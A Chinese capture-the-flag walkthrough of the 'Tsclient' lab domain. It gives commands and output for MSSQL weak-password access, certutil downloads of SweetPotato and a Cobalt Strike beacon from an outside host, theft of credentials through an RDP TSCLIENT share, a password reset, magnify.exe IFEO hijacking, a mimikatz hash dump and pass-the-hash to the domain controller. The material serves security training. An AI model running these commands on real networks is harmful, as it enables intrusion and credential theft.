春秋云境-Tsclient综合渗透通关wp
靶标介绍:Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。
起手fscan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
E:\T ools\w eb\f scan_1.8.4>fscan.exe -h 39.98.122.67
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/ ____/ __| / __| ' __/ _` | / __| | / /
/ /_\\ _____\_ _ \ ( __| | | ( _| | ( __| <
\_ ___/ | ___/\_ __| _| \_ _,_| \_ __| _| \_\
fscan version: 1.8.4
start infoscan
39.98.122.67:445 open
39.98.122.67:139 open
39.98.122.67:1433 open
39.98.122.67:80 open
[ *] alive ports len is: 4
start vulscan
[ *] WebTitle http://39.98.122.67 code:200 len:703 title:IIS Windows Server
[ +] mssql 39.98.122.67:1433:sa 1qaz!QAZ
已完成 4/4
[ *] 扫描结束,耗时: 9.790536s
发现mssql弱口令,上MDUT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
>ipconfig
Windows IP 配置
以太网适配器 以太网:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::fcb3:72d7:fb96:783b%14
IPv4 地址 . . . . . . . . . . . . : 172.22.8.18
子网掩码 . . . . . . . . . . . . : 255.255.0.0
默认网关. . . . . . . . . . . . . : 172.22.255.253
隧道适配器 isatap.{ E309DFD0-37D7-4E89-A23A-3C61210B34EA} :
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 Teredo Tunneling Pseudo-Interface:
连接特定的 DNS 后缀 . . . . . . . :
IPv6 地址 . . . . . . . . . . . . : 2001:0:348b:fb58:3883:3151:d89d:85bc
本地链接 IPv6 地址. . . . . . . . : fe80::3883:3151:d89d:85bc%12
默认网关. . . . . . . . . . . . . : ::
>systeminfo
主机名: WIN-WEB
OS 名称: Microsoft Windows Server 2016 Datacenter
OS 版本: 10.0.14393 暂缺 Build 14393
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人:
注册的组织: Aliyun
产品 ID: 00376-40000-00000-AA947
初始安装日期: 2022/7/11, 12:46:14
系统启动时间: 2025/2/19, 13:51:45
系统制造商: Alibaba Cloud
系统型号: Alibaba Cloud ECS
系统类型: x64-based PC
处理器: 安装了 1 个处理器。
[ 01] : Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2500 Mhz
BIOS 版本: SeaBIOS 449e491, 2014/4/1
Windows 目录: C:\W indows
系统目录: C:\W indows\s ystem32
启动设备: \D evice\H arddiskVolume1
系统区域设置: zh-cn; 中文( 中国)
输入法区域设置: zh-cn; 中文( 中国)
时区: ( UTC+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 3,950 MB
可用的物理内存: 937 MB
虚拟内存: 最大值: 4,770 MB
虚拟内存: 可用: 683 MB
虚拟内存: 使用中: 4,087 MB
页面文件位置: C:\p agefile.sys
域: WORKGROUP
登录服务器: 暂缺
修补程序: 安装了 6 个修补程序。
[ 01] : KB5013625
[ 02] : KB4049065
[ 03] : KB4486129
[ 04] : KB4486131
[ 05] : KB5014026
[ 06] : KB5013952
网卡: 安装了 1 个 NIC。
[ 01] : Red Hat VirtIO Ethernet Adapter
连接名: 以太网
启用 DHCP: 是
DHCP 服务器: 172.22.255.253
IP 地址
[ 01] : 172.22.8.18
[ 02] : fe80::fcb3:72d7:fb96:783b
Hyper-V 要求: 已检测到虚拟机监控程序。将不显示 Hyper-V 所需的功能。
>whoami /priv
特权信息
----------------------
特权名 描述 状态
============================= ==================== ======
SeAssignPrimaryTokenPrivilege 替换一个进程级令牌 已禁用
SeIncreaseQuotaPrivilege 为进程调整内存配额 已禁用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeImpersonatePrivilege 身份验证后模拟客户端 已启用
SeCreateGlobalPrivilege 创建全局对象 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用
尝试sweetpotato提权
1
certutil -urlcache -split -f http://39.106.75.37/SweetPotato.exe C:\w indows\t emp\s weet.exe
提权成功
1
C:/Windows/Temp/sweet.exe -a whoami
上线cs
1
C:/Windows/Temp/sweet.exe -a C:/Windows/Temp/cs.exe
下载flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
_________ ________ ________ ___ ___ _______ ________ _________
| \_ __ ___\\ ____\|\ ____\|\ \ | \ \|\ ___ \ | \ ___ \|\_ __ ___\
\| ___ \ \_\ \ \_ __| \ \ \_ __| \ \ \ \ \ \ \ __/| \ \ \\ \ \| ___ \ \_ |
\ \ \ \ \_ ____ \ \ \ \ \ \ \ \ \ \ \_ | /_\ \ \\ \ \ \ \ \
\ \ \ \| ____| \ \ \ \_ ___\ \ \_ ___\ \ \ \ \_ | \ \ \ \\ \ \ \ \ \
\ \_ _\ ____\_\ \ \_ ______\ \_ ______\ \_ _\ \_ ______\ \_ _\\ \_ _\ \ \_ _\
\| __| | \_ ________\| _______| \| _______| \| __| \| _______| \| __| \| __| \| __|
\| _________|
Getting flag01 is easy, right?
flag01: flag{ REDACTED}
Maybe you should focus on user sessions...
fscan 扫内网
1
2
3
certutil -urlcache -split -f http://39.106.75.37:8000/fscan.exe C:\w indows\t emp\f scan.exe
C:\w indows\t emp\s weet.exe -a "C:\windows\temp\fscan.exe -h 172.22.8.18/24"
得到结果
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
start infoscan
( icmp) Target 172.22.8.18 is alive
( icmp) Target 172.22.8.15 is alive
( icmp) Target 172.22.8.31 is alive
( icmp) Target 172.22.8.46 is alive
[ *] Icmp alive hosts len is: 4
172.22.8.15:88 open
172.22.8.46:445 open
172.22.8.31:445 open
172.22.8.18:1433 open
172.22.8.15:445 open
172.22.8.31:135 open
172.22.8.18:445 open
172.22.8.46:139 open
172.22.8.31:139 open
172.22.8.15:139 open
172.22.8.46:135 open
172.22.8.18:139 open
172.22.8.15:135 open
172.22.8.46:80 open
172.22.8.18:135 open
172.22.8.18:80 open
[ *] alive ports len is: 16
start vulscan
[ *] NetInfo
[ *] 172.22.8.18
[ ->] WIN-WEB
[ ->] 172.22.8.18
[ ->] 2001:0:348b:fb58:3883:3151:d89d:85bc
[ *] NetInfo
[ *] 172.22.8.31
[ ->] WIN19-CLIENT
[ ->] 172.22.8.31
[ *] NetInfo
[ *] 172.22.8.46
[ ->] WIN2016
[ ->] 172.22.8.46
[ *] WebTitle http://172.22.8.18 code:200 len:703 title:IIS Windows Server
[ *] NetBios 172.22.8.31 XIAORANG\W IN19-CLIENT
[ *] NetBios 172.22.8.15 [ +] DC:XIAORANG\D C01
[ *] NetInfo
[ *] 172.22.8.15
[ ->] DC01
[ ->] 172.22.8.15
[ *] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393
[ *] WebTitle http://172.22.8.46 code:200 len:703 title:IIS Windows Server
[ +] mssql 172.22.8.18:1433:sa 1qaz!QAZ
[ +] Process created, enjoy!
有RDP
1
2
3
4
172.22.8.15:3389 open
172.22.8.31:3389 open
172.22.8.46:3389 open
172.22.8.18:3389 open
和NetBIOS
1
2
3
4
172.22.8.15 XIAORANG\D C01 # 域控
172.22.8.31 XIAORANG\W IN19-CLIENT
172.22.8.46 WIN2016.xiaorang.lab
172.22.8.18 WIN-WEB # 本机
发现有其他用户使用rdp连接过来
注入John进程
对user John查看网络共享
得到
1
2
3
4
5
状态 本地 远程 网络
-------------------------------------------------------------------------------
\\ TSCLIENT\C Microsoft Terminal Services
命令成功完成
随后
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
beacon> shell dir \\ TSCLIENT\C
[ *] Tasked beacon to run: dir \\ TSCLIENT\C
[ +] host called home, sent: 47 bytes
[ +] received output:
驱动器 \\ TSCLIENT\C 中的卷没有标签。
卷的序列号是 C2C5-9D0C
\\ TSCLIENT\C 的目录
2022/07/12 10:34 71 credential.txt
2022/05/12 17:04 <DIR> PerfLogs
2022/07/11 12:53 <DIR> Program Files
2022/05/18 11:30 <DIR> Program Files ( x86)
2022/07/11 12:47 <DIR> Users
2022/07/11 12:45 <DIR> Windows
1 个文件 71 字节
5 个目录 30,041,149,440 可用字节
读以下txt
1
2
3
4
5
beacon> shell type \\ TSCLIENT\C\c redential.txt
[ *] Tasked beacon to run: type \\ TSCLIENT\C\c redential.txt
[ +] host called home, sent: 63 bytes
[ +] received output:
xiaorang.lab\A ldrich:Ald@rLMWuy7Z!#
代理转发
尝试密码喷洒攻击
1
2
┌──( kali㉿kali) -[ ~/Desktop]
└─$ crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'
STATUS_LPGON_FAILURE,密码已经过期
1
python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#' @172.22.8.15 -newpass 'qweQWE123'
rdp登录172.22.8.46
1
2
Aldrich@xiaorang.lab
qweQWE123#
发现不出网
尝试放大镜提权
1
Get-ACL -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *
劫持,修改注册表
1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f
锁定用户,在右下角找到放大镜,读flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
beacon> logonpasswords
[ *] Tasked beacon to run Mimikatz inject pid:1928
[ *] Tasked beacon to run mimikatz' s sekurlsa::logonpasswords command into 1928 ( x64)
[ +] host called home, sent: 297602 bytes
[ +] received output:
Authentication Id : 0 ; 15467382 ( 00000000:00ec0376)
Session : RemoteInteractive from 2
User Name : Aldrich
Domain : XIAORANG
Logon Server : DC01
Logon Time : 2023/7/30 17:28:43
SID : S-1-5-21-3289074908-3315245560-3429321632-1105
msv :
[ 00000003] Primary
* Username : Aldrich
* Domain : XIAORANG
* NTLM : e19ccf75ee54e06b06a5907af13cef42
* SHA1 : 9131834cf4378828626b1beccaa5dea2c46f9b63
* DPAPI : a3f0e6622289e7951e9a12b27368cda5
tspkg :
wdigest :
* Username : Aldrich
* Domain : XIAORANG
* Password : ( null)
kerberos :
* Username : Aldrich
* Domain : XIAORANG.LAB
* Password : ( null)
ssp :
credman :
Authentication Id : 0 ; 52967 ( 00000000:0000cee7)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : ( null)
Logon Time : 2023/7/30 16:21:58
SID : S-1-5-90-0-1
msv :
[ 00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 4ba974f170ab0fe1a8a1eb0ed8f6fe1a
* SHA1 : e06238ecefc14d675f762b08a456770dc000f763
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : ( null)
kerberos :
* Username : WIN2016$
* Domain : xiaorang.lab
* Password : ...... ( 略)
ssp :
credman :
Authentication Id : 0 ; 52935 ( 00000000:0000cec7)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : ( null)
Logon Time : 2023/7/30 16:21:58
SID : S-1-5-90-0-1
msv :
[ 00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 02b2a436556a3dd5d6638ad03f87c43e
* SHA1 : c81ff31553d1e42093c29c46ed26bdca3257cc40
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : ( null)
kerberos :
* Username : WIN2016$
* Domain : xiaorang.lab
* Password : ...... ( 略)
ssp :
credman :
Authentication Id : 0 ; 996 ( 00000000:000003e4)
Session : Service from 0
User Name : WIN2016$
Domain : XIAORANG
Logon Server : ( null)
Logon Time : 2023/7/30 16:21:58
SID : S-1-5-20
msv :
[ 00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 02b2a436556a3dd5d6638ad03f87c43e
* SHA1 : c81ff31553d1e42093c29c46ed26bdca3257cc40
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : ( null)
kerberos :
* Username : win2016$
* Domain : XIAORANG.LAB
* Password : ...... ( 略)
ssp :
credman :
Authentication Id : 0 ; 23516 ( 00000000:00005bdc)
Session : UndefinedLogonType from 0
User Name : ( null)
Domain : ( null)
Logon Server : ( null)
Logon Time : 2023/7/30 16:21:58
SID :
msv :
[ 00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 02b2a436556a3dd5d6638ad03f87c43e
* SHA1 : c81ff31553d1e42093c29c46ed26bdca3257cc40
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 15442286 ( 00000000:00eba16e)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : ( null)
Logon Time : 2023/7/30 17:28:42
SID : S-1-5-90-0-2
msv :
[ 00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 02b2a436556a3dd5d6638ad03f87c43e
* SHA1 : c81ff31553d1e42093c29c46ed26bdca3257cc40
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : ( null)
kerberos :
* Username : WIN2016$
* Domain : xiaorang.lab
* Password : ...... ( 略)
ssp :
credman :
Authentication Id : 0 ; 15442262 ( 00000000:00eba156)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : ( null)
Logon Time : 2023/7/30 17:28:42
SID : S-1-5-90-0-2
msv :
[ 00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 02b2a436556a3dd5d6638ad03f87c43e
* SHA1 : c81ff31553d1e42093c29c46ed26bdca3257cc40
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : ( null)
kerberos :
* Username : WIN2016$
* Domain : xiaorang.lab
* Password : ...... ( 略)
ssp :
credman :
Authentication Id : 0 ; 995 ( 00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : ( null)
Logon Time : 2023/7/30 16:22:01
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : ( null)
* Domain : ( null)
* Password : ( null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 ( 00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : ( null)
Logon Time : 2023/7/30 16:21:59
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : ( null)
* Domain : ( null)
* Password : ( null)
kerberos :
* Username : ( null)
* Domain : ( null)
* Password : ( null)
ssp :
credman :
Authentication Id : 0 ; 999 ( 00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN2016$
Domain : XIAORANG
Logon Server : ( null)
Logon Time : 2023/7/30 16:21:58
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : ( null)
kerberos :
* Username : win2016$
* Domain : XIAORANG.LAB
* Password : ( null)
ssp :
credman :
hash传递,利用wmiexec.py
1
python3 wmiexec.py -hashes :e212b78fc35c036877d53814c96d3d71 xiaorang.lab/WIN2016\$ @172.22.8.15
在C:\users\administrator\flag\flag03.txt
直接读flag03
1
flag03flag{ 294ce447-c166-4573-8596-0238bba3607d}